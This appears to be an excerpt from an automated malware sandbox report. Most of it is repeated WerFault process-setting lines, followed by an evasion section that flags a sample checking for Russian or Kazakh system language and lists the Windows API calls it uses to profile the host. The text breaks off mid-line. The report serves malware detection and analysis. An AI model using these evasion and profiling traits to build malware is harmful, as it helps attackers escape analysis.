    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX

    Malware Analysis System Evasion

    barindex
    Contains functionality to behave differently if execute on a Russian/Kazak computer
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BB4B00 PathAddBackslashA,CreateFileA,SetFilePointer,SetFilePointer,LockFile,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetModuleFileNameA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetUserNameA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetEnvironmentVariableA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetSystemDefaultLangID,memset,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetDC,GetDeviceCaps,GetSystemMetrics,GetSystemMetrics,_snprintf,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetDateFormatA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetTimeFormatA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetTimeZoneInformation,_snprintf,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetSystemWindowsDirectoryA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,IsUserAnAdmin,IsUserAnAdmin,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetHandleInformation,CloseHandle, mov dword ptr [ebp-20h], 00000419h 2_2_02BB4B00
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 5_2_008D4B00 PathAddBackslashA,CreateFileA,SetFilePointer,SetFilePointer,LockFile,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetModuleFileNameA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetUserNameA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetEnvironmentVariableA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetSystemDefaultLangID,memset,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetDC,GetDeviceCaps,GetSystemMetrics,GetSystemMetrics,_snprintf,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetDateFormatA,SetFileP